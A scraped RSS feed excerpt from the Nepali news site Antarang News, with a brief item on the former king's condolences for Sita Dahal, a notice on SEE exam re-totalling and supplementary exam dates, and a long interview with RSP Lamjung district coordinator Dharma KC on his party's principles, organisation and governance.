यसैगरी, पूर्वराजा ज्ञानेन्द्र शाहबाट प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डकी दिवंगत पत्नी सीता दाहालप्रति श्रद्धाञ्जली व्यक्त भएको छ । पूर्वराजाले सीता दाहालको निधनमा दुःख व्यक्त गर्दै श्रद्धाञ्जली अर्पण गर्न आफ्ना प्रतिनिधि पशुपतिभक्त महर्जनलाई माओवादी केन्द्रको पार्टी कार्यालय पेरिसडाँडामा पठाउनु भएको हो ।
पेरिसडाँडामा पुगेर महर्जनले पूर्वराजाको तर्फबाट सीता दाहालप्रति श्रद्धाञ्जली अर्पण गर्दै प्रधानमन्त्री प्रचण्डसहित शोकाकुल परिवारमा समवेदना प्रकट गरेको पूर्वराजाका संवाद सचिव फणि पाठकले जानकारी दिनु भयो ।
]]>https://www.antaranganews.com/?feed=rss2&p=168680एसइईको पुनर्योगका लागि आवेदन दिने म्याद तोकियो
https://www.antaranganews.com/?p=16754
https://www.antaranganews.com/?p=16754#respondSat, 08 Jul 2023 10:40:49 +0000https://www.antaranganews.com/?p=16754काठमाडौं– राष्ट्रिय परीक्षा बोर्डले माध्यमिक शिक्षा परीक्षा (एसईई), २०७९ मा सहभागी विद्यार्थीले प्राप्त ग्रेडमा चित्त नबुझेमा पुनर्याेगका आवेदन दिन सक्ने सूचना प्रकाशन गरेको छ । पुनर्याेगका लागि आउँदो साउन ५ गतेसम्ममा आवेदन दिन सक्ने बोर्डले असार २३ गते जनाउ दिएको हो ।
ग्रेडमा चित्त नबुझेमा पुनर्योगका लागि आगामी साउन ५ गतेसम्ममा आवेदन दिन सक्नेछन् राष्ट्रिय परीक्षा बोर्डले जनाएको छ । साधारण र प्राविधिकतर्फ नियमित तथा ग्रेडवृद्धि परीक्षामा सहभागी विद्यार्थीले तोकिएको ढाँचा तथा प्रक्रियाबमोजिम पुनर्याेग गराउन आवेदन दिन सक्नेछन् । बोर्डको कार्यालय वा सम्बन्धित शिक्षा विकास तथा समन्वय एकाइमा तोकिएको आवेदन दिन सकिनेछ । सोका लागि आवश्यक व्यवस्था मिलाउन सबै एकाइहरूलाई बोर्डले भनेको छ ।
त्यस्तै, एसइईको पूरक परीक्षा साउन २६ र २७ गते हुने भएको छ । अन्तिम ग्रेड ‘सी’ वा ‘सी’भन्दा कम प्राप्त गरेका विद्यार्थीले पूरक परीक्षा दिन पाउने छन् । राष्ट्रिय परीक्षा बोर्ड परीक्षा नियन्त्रण कार्यालयले एक सूचना प्रकाशित गरी पूरक परीक्षा साउन २६ र २७ गते हुने असार २३ गते जनाएको हो ।
ग्रेडवृद्धिका लागि साउन २१ गतेभित्र फारम भरेर विद्यालयबाट शिक्षा विकास तथा समन्वय एकाइमा पेस गर्नुपर्ने उक्त सूचनामार्फत जनाइएको छ । परीक्षा रद्द भएका परीक्षार्थीले पूरक परीक्षा दिन पाउने छैनन् । एक विषयको मात्र पूरक परीक्षा दिनुपर्ने विद्यार्थीले पहिलो दिन परीक्षा दिनु पर्ने बार्डले जनाएको छ ।
साधारण र प्राविधकतर्फ नियमित तथा ग्रेडवृद्धि परीक्षामा सहभागी विद्यार्थीले तोकिएको ढाँचा तथा प्रक्रियाबमोजिम गराउन आवेदन दिन सक्ने उल्लेख छ ।
बढीमा दुई विषयसम्म अनुपस्थित रहेका परीक्षार्थीले पनि पूरक परीक्षा दिन पाउने बोर्डले जनाएको छ । सोका लागि बोर्डको कार्यालय या सम्बन्धित शिक्षा विकास तथा समन्वय एकाइमा तोकिएको आवेदन दिन सक्ने जनाएको छ । सोको लागि आवश्यक व्यवस्था मिलाउन सबै एकाइहरूलाई बोर्डले दिर्नेशन दिएको छ ।
गत चैत १७ गतेदेखि सञ्चालन गरिएको एसइईको नतिजा यही असार २१ गते सार्वजनिक गरिएको थियो । त्यसमा २२ हजार चार सय ७५ विद्यार्थीले ‘ए प्लस’ ग्रेड ल्याएका थिए ।
]]>https://www.antaranganews.com/?feed=rss2&p=167540हामी कुनै वाद, तन्त्रभन्दा पनि नेपालवाद, विकासवाद, संविधानवाद आदिमा विश्वास गर्दछौं : धर्म केसी, जिल्ला संयोजक, रास्वपा
https://www.antaranganews.com/?p=13362
https://www.antaranganews.com/?p=13362#respondTue, 21 Mar 2023 01:02:37 +0000https://www.antaranganews.com/?p=13362(यतिबेला मुलुकमा रहेका राजनीतिक दलहरूमध्ये आम नागरिकका लागि सबैभन्दा बढी भरोसाको केन्द्रका रुपमा राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा) बन्न पुगेको छ । त्यो दलले लमजुङमा पनि गत मंसिर ४ गते सम्पन्न आमनिर्वाचनमा प्रतिनिधिसभामा झण्डै १० हजार मत पाएर तेस्रो शक्तिको रुपमा उदाएको छ । तर, त्यस यता सो दलका गतिविधि खासै जिल्लामा देखिने गरेका छैनन् । राष्ट्रिय मान्यता प्राप्त दल भएर पनि सार्वजनिक मञ्चमा पनि त्यो दलको उपस्थिति खासै देखिदैन । त्यो दल लमजुङमा के कसरी अघि बढ्दै छ ? समसामयिक विषयमा रास्वपाका जिल्ला संयोजक एवम् गत प्रतिनिधिसभा सदस्य पदमा सो पार्टीका उम्मेदवार रहनु भएका धर्म केसी सँग अन्तरङ्ग साप्ताहिकका सम्पादक एवम् अन्तरङ्ग न्यूज डटकमका अध्यक्ष नवराज पहाडी ले गर्नु भएको भलाकुसारीको सारसंक्षेप– सं.) अन्तरङ्ग– यहाँको परिचय ? केसी– पेशाले वातावरण इञ्जिनियर । हाल जलवायु परिवर्तन, दिगो विकास, नवीकरणीय उर्जाको क्षेत्रमा विज्ञका रुपमा काम गरिरहेको छु । साथै, राजनीतिक रुपमा राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)को जिल्ला संयोजक तथा केन्द्रको थिङ्क ट्याङ्कमा आवद्ध छु । अन्तरङ्ग– के कस्ता काममा व्यस्त हुनुहुन्छ ? केसी– जिल्लाका पार्टीको संगठन विस्तारको काममा छु । साथै, व्यवसायिक रुपमा पनि आफ्नो कार्यक्षेत्रमा पनि थोरै समय खर्चिरहेको छु । यसै सन्दर्भमा पार्टीको स्थापना दिवस(आउँदो असार ७ गते)का अवसरमा आयोजना गरिने सप्ताह व्यापी विशेष कार्यक्रमको तयारीमा जुटिरहेको छु । सो अवसरमा राष्ट्रिय तथा अन्तराष्ट्रियस्तरका विविध कार्यक्रमहरू गर्ने पार्टीले योजना बनाएको छ । अन्तरङ्ग– जिल्लाको नेतृत्व लिनु भएको व्यक्तित्व यता(जिल्लातिर) त खासै देखिनु हुन्न नि ! जिल्लाका सार्वजनिक मञ्चमा पनि उपस्थिति हुँदैन ? केसी– जिल्लामा हुने कार्यक्रममा समयले साथ दिदासम्म आफ्नो उपस्थिति बढाइरहेको छु । केन्द्रमा र व्यवसायिक रुपमा पनि आफूलाई संलग्न गराइरहनु पर्ने भएइको हुँदा कतिपय कार्यक्रममा आफू उपस्थित हुन नसक्दा हाम्रो पार्टीका प्रतिनिधिहरूले भाग लिइरहनु भएको छ । व्यक्ति भन्दा पनि पार्टी महत्वपूर्ण हुने भएको हुँदा र साथीहरू पनि हरतरहले सक्षम हुनु भएको हुँदा उहाँहरूको उपस्थितिले पनि मेरो अनुपस्थिति महसुस हुन पाएको छैन भन्ने लाग्छ । अन्तरङ्ग– बौद्धिक व्यक्तित्वहरू त देशको विकासका विविध पक्ष(कार्य)मा आफ्नो क्षमताको उपयोग गर्नु पर्ने हो नि ? राजनीतिमा कसरी होमिन पुग्नु भयो ? केसी– देशको राजनीतिक अवस्थालाई राम्रोसँग पहिचान गरी तिनीहरूको उचित समाधान निकाल्न सकेमा मात्र हामीले सोचे अनुरुप विकासको गतिले तिब्रता लिन सक्छ । व्यक्तिगत रुपमा मैले गर्न सक्ने योगदान भन्दा पनि विकास भनेको सामुहिक संलग्नतामा गरिने दिगो किसिमको हुुनुपर्दछ । राजनीतिमा आउनुभन्दा अगाडि मैले विज्ञका रुपमा संघ, प्रदेश र स्थानीय तहमा विकासका विभिन्न योजनाहरू ल्याउने, साथै नयाँ योजनाहरू सुझाउने धेरै कोशिश गरेँ । तर आफूले सोचे अनुरुप ती योजनाहरूले गति लिन र प्रतिफल दिन सकेनन् । त्यसमा सबैभन्दा ठूलो समस्या भनेको मेरो अनुभवमा राजनीतिक इच्छा शक्तिको कमी नै हो । राजनीतिक स्थायित्वको अभाव, जनताप्रतिको उत्तरदायित्वको कमी र कतिपय अवस्थामा विज्ञताको कमी पनि पाएँ । आफूले देश विदेशमा सिकेको सीप, ज्ञान, अनुभव यही देशको विकासको लागि योगदान दिन आफै राजनीतिमा नआईकन त्यति फलदायी हुने अवस्था नदेखिएकोले राजनीतिमा होमिने निर्णय गरेको हुँ । यो यौटा कठिन निर्णय थियो तर अपरिहार्य पनि हो भन्ने ठानेको छु । विभिन्न देशहरूमा रहेर काम गर्दा त्यहाँको राजनीतिक नेतृत्वको चरित्र, उनीहरूको देशप्रतिको माया र यौटा पुस्ताको विशेष योगदानले ती देशले विकासमा फड्को मारेको देखेँ । त्यसबाट अब हामी कति समयसम्म अन्य देशका लागि मानव संसाधन आपूर्ति गर्ने स्रोतको रुपमा रहिरहने ? विदेशी माटोमा बगाइएका रगत पसिना, सीप र ज्ञान यही माटोमा पोख्न सक्यौं भने प्राकृतिक स्रोत र साधनले सम्पन्न हाम्रो देशले विकासमा फड्को मार्न सक्छ, सर्वसाधारणको जीवनस्तर उठ्छ, न्यायमा पहुँच हुन्छ र त्यति धेरै समय पर्खन पर्र्दैन अनुभूति गरी नेपालीहरूको जीवनसँग साक्षात्कार गर्नका लागि आफ्नोतर्फबाट सम्भव हुने सबै योगदानहरू दिन यौटा जिम्मेवार नागरिकको हिसावले राजनीतिमा आउने निर्णय गरेँ । अन्तरङ्ग– यो देशको समस्या यहाँले उल्लेख गर्नु भएका भन्दा पनि जड समस्या त सुशासन एवम् अनुशासनमा ह्रास र सरकारी कार्याललयस्तरमा हुने ढिलासुस्ती तथा घुसखोरी हो नि ? त्यस्तो वस्तुगत तथ्यलाई अन्देखा गर्नु भएको हो ? केसी– तपाईले उठान गर्नु भएका समस्यालाई अन्देखा गरेको होइन । यी समस्याहरूको पनि जड राजनीतिक नेतृत्वको क्षमता, आचरण, पारदर्शीता र राजनीतिक स्थायित्वसँगै आउने प्रश्न हुन् । जब राजनीतिक नेतृत्वले इमान्दार रुपमा नेतृत्वदायी भूमिका निर्वाह गर्न सक्छ भने त्यसले राजनीति बेथिति अर्थात कुशासन र कर्मचारीतन्त्रबाट हुने ढिलासुस्ती र सबैखाले भ्रष्टाचारमा कमी ल्याएको कुरा हाम्रा पार्टी सभापति एवम् निवर्तमान उपप्रधान तथा गृहमन्त्रीको कार्यकालमै हामीले अनुभव गरेका छौं । भ्रष्टाचारमा शून्य सहनशीलता हाम्रो पार्टीको मूलमर्म हो र त्यही अनुसार हामी व्यवहारिक रुपमै काम गरिरहेका छौं । अन्तरङ्ग– तपाईको पार्टीलाई गत निर्वाचनमा अप्रत्यासित मत दिएर यहाँहरूलाई जिम्मेवार स्थानमा नेपाली मतदाताले पु¥याए, त्यसको दायित्वबोध के कसरी गर्दै हुनुहुन्छ ? केसी– सर्वप्रथम हामीलाई मतदान गर्नु हुने सम्पूर्ण मतदाता आमा– बुबा, दाजु– भाइ, दिदी– बहिनीहरू र हामी प्रति सुभेच्छा राख्नु हुने र विविध कारणले हामीलाई मतदान गर्न नसक्नु भएका सबैलाई हृदयदेखिनै धन्यवाद दिन्छु । हामीले पाएको मत देख्दा अप्रत्यासित देखिए पनि हाम्रो लागि त्यो आंकलनभन्दा धेरै नै कम नै हो । करिब १२ लाख मत हाम्रो पार्टीले प्राप्त गरेको छ । तर हामी यो देशका सबै नागरिकका लागि काम गर्ने दायित्व हाम्रो भन्ने बुझेर त्यो अनुरुप क्रियाशील हुँदै आएका छौं र गर्ने प्रण पुनः दोहोर्याउँछु । हामी छोटो समय सरकारमा रहदा पनि सुशासनको प्रत्याभूति, खास गरी पहुँच विहीन जनस्तरले भोग्नु परेका अन्यायका घट्नाहरूलाई हामीले आफ्नै ठानेर उपचारका उपाय अवलम्बन गरिआएका छौं र गर्ने थप प्रष्ट्याउन चाहन्छु ।
यसैगरी, सरकारमा रहँदा शिक्षा, स्वास्थ्य, रोजगारका साथै गृहप्रशासनमा व्यापक सुधार ल्याउने कोशिश गरेका विभिन्न उदाहरणहरू छन् । अन्तरङ्ग– कुनै पनि कार्य वा संघसंस्था या पार्टी नै भनौं– को लक्ष्य हासिल (मञ्जिलसम्म पुग्न) गर्नका लागि त्यसको प्रष्ट सिद्धान्त, उद्देश्य, दुरदृष्टि अनि सोही अनुसारका नीति, योजना, रणनीति आदि हुनुपर्छ भनिन्छ, हो पनि । तर यहाँको पार्टीको सिद्धान्त नै प्रष्ट छैन भन्ने टिका टिप्पणी पनि सुनिदै आएको छ । तपाईहरू ‘कुइराकै काग’ जस्तै भइरहनु भएको हो त ? केसी– हामी कुनै वाद तन्त्रभन्दा पनि नेपालवाद, विकासवाद, संविधानवाद आदिमा विश्वास गर्दछौं । हालसम्म अन्य पार्टीहरूले हामी जनतालाई यो वाद वा त्यो वाद भनि विभाजित गराउने र आफूले राज गर्ने गरिरहे । जसको फलस्वरुप आजसम्म हामी अतिकम विकशित देशको सूचिबाट माथि उठ्न सकेका छैनौं । हामीलाई चाहिएको ‘सुखी जनता र शान्त नेपाल’ हो । सैद्धान्तिक हिसावले हामी संविधानवाद मान्छौं यो भनेको हाम्रो संविधानले प्रत्याभूत गरेका मौलिक अधिकारहरू सम्पूर्ण जनताको सहज पहुँचमा हुनुपर्छ वा उनीहरूले तदनुरुपका सेवा सुविधाहरू उपभोग गर्न पाउनु पर्छ भन्ने हो । सविधानले सबैलाई स्वास्थ्यमा पहुँच, शिक्षाको अवसर, रोजगारीको अवसर, न्यायमा पहुँच आदि दिएको छ । तर हेर्नुस् त हाम्रो अवस्था करिब ६० लाख नेपालीहरू रोजगारीका लागि विदेशी माटोमा रगत पसिना बगाउन बाध्य छन् । गरिबका छोराछोरीहरूले गुणस्तरीय शिक्षाको पहुँच पाउन सकेका छैनन्, एउटा सिटामोलसम्म पनि नपाएर मर्नु पर्ने अवस्थामा कयौं नेपालीहरू रहेको तीतो सत्य हाम्रा अगाडि छ । त्यसैले अब, देशमा विकासको मुहान फुटाई अन्तराष्ट्रियस्तरमा देशको साख बढाउने काममा लाग्न अब ढिला गर्नु हुँदैन । त्यसका लागि सुशासन पहिलो सर्त हो । अन्तरङ्ग– पार्टीको संगठन ढाँचा के कस्तो छ नि ? केसी– हालका लागि हामी जिल्लाको संगठन विस्तारमा लागेको हुँदा यसको ढाँचाको मात्र कुरा गरौं, जिल्लामा पार्टीको जिल्ला संयोजक र उपसंयोजक छौं । निर्वाचन क्षेत्र कमिटि, पालिका कमिटि र वडास्तरमा पनि कमिटि रहने विधानमा व्यवस्था छ र त्यो संरचना निर्माण गर्न हामी जुटिरहेका छौं । सबै कमिटि(पालिका र वडा) ११ सदस्यीय हुन्छ । तर निर्वाचन क्षेत्र कमिटि पाँच जनाको मात्र हुन्छ र उहाँहरू पार्टी सदस्यहरूबाट निर्वाचित भएर आउनु हुन्छ । जिल्लाबाट प्रदेश र केन्द्रका विभागहरूमा सदस्यहरू पनि चयन हुनुहुन्छ । पार्टीको प्रदेश कमिटि, प्रदेशमा रहेका निर्वाचन क्षेत्रहरूको आधारमा गठन हुन्छ । हाम्रो गण्डकी प्रदेशमा ४८ सदस्यीय कमिटि रहने विधानमा व्यवस्था छ । त्यस्तै, केन्द्रीय कमिटिमा १२१ सदस्यीय रहने व्यवस्था छ ।
यसैगरी, केन्द्र, प्रदेश र पालिकास्तरमा विभागहरू रहन्छन् । पालिकास्तरमा रहने विभागहरूमा अभियान तथा प्रचारप्रसार, मानव विकास प्रवद्र्धन, प्रशिक्षण, संगठन, उद्योग तथा वाणिज्य र श्रम तथा उपभोक्ता हित, कानुन न्याय तथा मानवअधिकार, कृषि सहकारी तथा प्राकृतिक स्रोत, महिला तथा सामाजिक, विकास तथा प्रविधि, शिक्षा तथा स्वास्थ्य, पालिका गुनासो व्यवस्थापन, उत्पादन प्रवर्धन, विकास योजना तथा नीति तर्जुमा, आर्थिक व्यवस्थापन, र्याट(RAT) संयोजन(दुर्त कार्य दल), सूचना तथा प्रविधि, पालिकाका सदस्यता अभिलेखिकरण, सम्पर्क विभाग आदि । अन्तरङ्ग– नेपालमा लोभीपापीहरूको संख्यामा दिनहुँ बढोत्तरी हुँदै आएको छ, अनुशासन एवम् नैतिकता कुन चरीको नाम हो ? जस्ता अनुभूति बढिरहेका छन् । ठूला भनिने राजनीतिक दलहरूका नेता/कार्यकर्ताहरूले मनपरी गर्न छाडेका छैछन् । स्थानीय तहमा पनि जस्ले जित्यो उस्कै मात्र हाली मुहाली हुने, बजेट पनि तिन्का परिवारको पैतृकसम्पत्ती झैं खर्चिने प्रवृत्ती बढी रहेको छ । पालिकाका पदाधिकारीहरू अन्यले बजेट माग गर्न जाँदा नीति नियम देखाउँदै तर्काउने/पन्छाउने तर उनका मान्छेका लागि ती नीति नियम केही नचाहिने स्थिति मौलाइरहेको छ । त्यतिमात्र हैन, दलको विधान, घोषणापत्र एकतिर थन्क्याएर तत्काल के गर्दा मान्छेका बुद्धि भुट्न सकिन्छ र आफ्ना स्वार्थी अभिष्ट पुरा गर्न सकिन्छ भन्ने ध्याउन्नमा मस्त छन् । उदाहरणका लागि विधानमा कुनै पनि तहको समितिमा तोकिएको संख्या भन्दा दोब्बर जस्तो संख्यामा मनोनित गरेर मान्छेहरूलाई पदका पगरी गुथाउन र मानिसका महत्वाकांक्षा बढाउनमा तल्लिन छन्, त्यहाँ जाने मान्छेहरू पनि पद पाएकोमा दङ्ग र हनुमानदास देखिन्छन् । यस्तो स्थितिमा तपाईको फरक ढंगको पार्टीको संगठन ढाँचा(११ जनाको मात्र जिल्ला/पालिका/वडा कार्य समिति)ले त्यस्ता लोभ र भ्रमलाई कसरी चिर्न सक्छ ? केसी– यो प्रश्नको उत्तर माथि सांकेतिक रुपमा माथि आइसकेको छ । हामी अर्काको नक्कल गर्न भन्दा पनि यो देशको धरातलीय अवस्थाको पहिचान गरेर अघि बढ्दै छौं, अब कागले कान लग्यो भनेर कागको पछि दौड्ने बेला छैन । जम्मो समिति गठन गरेर आपसमा गुटबन्दी र मनोमालिन्य बढाउने र कमिटिहरूलाई कार्यकर्ता थन्क्याउने, लेवी उठाउने र पार्टीलाई धनी तर देश र जनता गरीब बनाउँदै जाने पक्षमा हामी छैनौं । हाम्रा कामका आधारमा आम नेपालीहरूले मूल्यांकन गर्नु भएको हो र त्यसलाई उहाँहरूले प्राथमिकतामा राख्नु हुनेछ भन्ने विश्वासमा छौं ।
जहाँसम्म स्थानीय तहको बजेटको कुरा छ त्यो अबका दिनमा पारदर्शी हुनै पर्छ । अबका दिनमा पालिकास्तरमा बन्ने हाम्रा समितिले त्यहाँको बजेट, खर्चिने ढाँचा र पारदर्शीताका बारेमा अवश्य पनि खबरदारी गर्नु हुनेछ । योजना र बजेट खर्चिदा त्यसबाट लाभान्तिव हुनेहरू के कस्ता छन् ? आदि पनि खोजीको विषय बन्ने छ र बनाउनु पर्छ भन्ने हाम्रो पार्टीको नीति छ । अन्तरङ्ग– नेपालमा बनेका र बनाइने नीति नियमको व्यवहारिक कार्यान्वयनमा भारी चुनौती छ, जसको माथि पनि संकेत आइसकेको छ । मूल्यांकन, अनुगमन शून्य छ प्रायः कारबाही गर्ने निकायमा बस्ने व्यक्तिहरू आफै कुनै दिन भ्रष्टाचारको दलदलमा फसेका थिए यस्तो स्थितिमा सुशासनको प्रत्याभूति के कसरी हुन सक्छ होला ? हिजो राजसंस्था संविधानभन्दा माथि भयो भनेर फालियो तर आज राजनीतिक दलहरूका नेता÷कार्यकर्ताहरूका सोच, शैली तथा व्यवहार त राजाभन्दा पनि ठूला देखिन्छन् नि ? जस्तो कि, महिलाका लागि हरेक संघसंस्थामा ३३ प्रतिशत आरक्षण सविधानले नै गरेको छ । तर राजनीतिक दलका केन्द्रीय समिति, मन्त्रीपरिषदमा हेर्ने हो भन्ने त त्यो प्रावधान त लागू गरिएको छैन नि ? केसी– यो अत्यन्तै सान्दर्भिक विषय उठान गर्नु भयो । जुन अन्य पार्टीहरूको हकमा लागू हुन्छ तर हाम्रो पार्टी रास्वपामा हेर्नु भयो भने करिब ४० प्रतिशत महिलाहरूको प्रतिनिधित्व छ । सुरुका केही वर्षहरूमा आरक्षणको माध्यमबाट महिलाहरूलाई नेतृत्वमा ल्याई नेतृत्व विकास गर्नु पर्ने हुन्छ । तर रास्वपामा एक से एक क्षमतावान महिलाहरू हुनुहुन्छ र अब गठन हुने कमिटिहरूमा पनि हामी सोही अनुसार प्रतिनिधित्वको सुनिश्चितता गर्दछौं ।
अरु दलका मान्छेहरू के कस्तो भएका, बनेका र गरेका छन् ? भन्ने बारेमा खोज्ने भन्दा पनि हामीले आम नागरिकका दैनिकीसँग साक्षात्कार गर्ने र के कसरी उहाँका समस्यालाई सहज बनाउन सकिन्छ ? त्यसका लागि उपाय खोज्ने, पहल गर्ने हो । त्यो काम हामीले गर्दै आएका छौं र गर्ने छौं । अन्तरङ्ग– यहाँको पार्टीले युवाहरू र प्रमाणपत्र(डिग्री होल्डर) धारीहरूलाई बढी आकर्षित गरेको देखिन्छ तर व्यवहारमा त युवाहरूमा परिपक्वता, प्रतिवद्धता र निरन्तरताको कमी देखिदै आएको छ भने डिग्री होल्डरहरू पनि खासै सफल देखिदैनन् । लमजुङकै स्थिति हेर्दा– डा. हर्क गुरुङ, डा. पूर्णकान्त अधिकारी राजनीतिमा सफल देखिनु भएन, ऐलेकै संसद तथा राजनीतिक दलका केन्द्रीय समितिको बनोट हेर्ने हो भने पनि डिग्री होल्डरहरूको संख्या न्यून देखिन्छ नि ? केसी– हामी लमजुङे मतदाताहरूले क्षमतावान प्रतिनिधि छान्न नसक्नु नै हाम्रो विकासको अभिसाप सावित भएको छ । हुन त डिग्री लिदैमा सक्षम होइन्छ भन्ने पनि होइन तर विकास बुझेको देशलाई नेतृत्वदायी भूमिका दिन सक्ने, शैक्षिक हिसावले पनि सबल र यो जिल्लाको वस्तुस्थिति राम्रो ज्ञान भएको र यहाँको स्रोत साधनलाई समुचित रुपमा एकीकृत दिगो विकासका लागि प्रयोग गर्न सक्ने नेतृत्व अत्यन्त आवश्यक छ । जुन आजसम्म हामीले नपाएकै हो कि ? जो तपाईको प्रश्नबाटै प्रष्ट छ । अन्तरङ्ग– यौटा राजनीतिसँग जोडिएको तर फरक प्रसङ्ग बारम्बार खड्कने विषय बारेमा जिज्ञासा राखौं, सरकारी मान्यताक्रम (पोटफोलियो)मा पनि त्यत्तिकै विभेद भएको देखिन्छ । जस्तो कि, सामाजिक, सांस्कृति, शैक्षिक या अन्य क्षेत्रमा क्रियाशील रहेर आफ्नो जीवन डुबाएका व्यक्तित्वहरू र भरखरै २– ३ वर्ष रल्लिएर राजनीतिबाट पगरी गुथेको मान्छे (मानौं वडाध्यक्ष)को हैसियत माथि हुने विद्यमान नीति नियम छ । हाम्रो जिल्लामा २०४३ सालमै प्रज्ञा प्रतिष्ठानले आयोजना गरेको राष्ट्रिय कविता प्रतियोगितामा तेस्रो स्थानमा पुरस्कृत हुनु भएका वरिष्ठ कवि/साहित्यकार गोविन्दबहादुर कुँवर, जीवन नै शिक्षा र साहित्यका लागि चुर्लुम्म डुवाउनु भएका रुद्रनिधि तिवारी, सामाजिक कार्यमा समर्पित रहेर विवाह समेत नगर्नु भएकी सानुमाया गुरुङ जो सबै ८०– ८५ वर्ष उमेरको अतिपूज्य हुनुहुन्छ, उहाँहरू सार्वजनिक मञ्चमा जाँदा हैसियत वडाध्यक्षको भन्दा पनि तल हुने पद्दति कति न्यायोचित होला ? यस्तो प्रवृत्तीप्रति यहाँको पार्टीको दृष्टिकोण के कस्तो छ ? केसी– हामी समाजका प्रतिष्ठित व्यक्तित्वहरू जस्ले यो समाज, संस्कृति, देश र समाजका लागि अतुलनीय योगदान दिनु भएको छ, उहाँहरूलाई राष्ट्रले सम्मानित गर्नु पर्छ । र, उहाँहरूलाई मर्यादाक्रममा राजनीतिक व्यक्तित्वहरूसँग तुलना गरेर भन्दा पनि विशेष तवरले सम्मानित गरिनु पर्छ र ती मञ्चहरूमा उहाँहरूका लागि विशेष स्थान दिइनु पर्छ । अन्तरङ्ग– अन्त्यमा केही थप्न चाहनु हुन्छ कि ? केसी– लमजुङ आफैमा स्रोत साधनले सम्पन्न र अन्तराष्ट्रियस्तरमा नै ख्यातिप्राप्त विज्ञहरू रहेको जिल्ला भएर पनि विकासका हिसाबले हामी दुर्गम जिल्ला जस्तो भएका छौं । हामीलाई राजनीतिक नेतृत्वले सधैं आश्वासन मात्र दिएर भुलाइरहेका छन् । डा. हर्क गुरुङ पाउनु लमजुङका लागि गर्वको विषय थियो तर हामीले आफैसँग भएको हिरा चिन्न नसकेर वा उहाँलाई हराएर विकासका हिसावले हामी धेरै पछि पर्यौं । अब पनि क्षमतावान् राजनीतिक नेतृत्व चयन गर्न सकिएन भने हामी अझ पछाडि धकेलिने छौं । त्यसैले, विकासप्रेमी लमजुङबासी सम्पूर्ण आमा– बुवा, दाजु– भाइ, दिदी– बहिनीहरूलाई हामीसँग यौटै मालामा जोडिएर यो जिल्ला र समग्रमा देशकै विकासका लागि हातेमालो गरी अगाडि बढौं भन्ने विशेष अनुरोध गर्दछु । अहिले पनि नगरे कहिले ? हामीले नगरे कस्ले ? त्यसैले अब हामीसँग पर्खनका लागि समय छैन । अन्तरङ्ग– समय दिनु भयो, धन्यवाद ! केसी– मलाई हाम्रो पार्टीका बारेमा आफ्ना धारणा व्यक्त गर्न यो अवसर दिनु भएकोमा तपाई र अन्तरङ्ग न्यूज डटकमप्रति आभार व्यक्त गर्दछु ।
]]>https://www.antaranganews.com/?feed=rss2&p=133620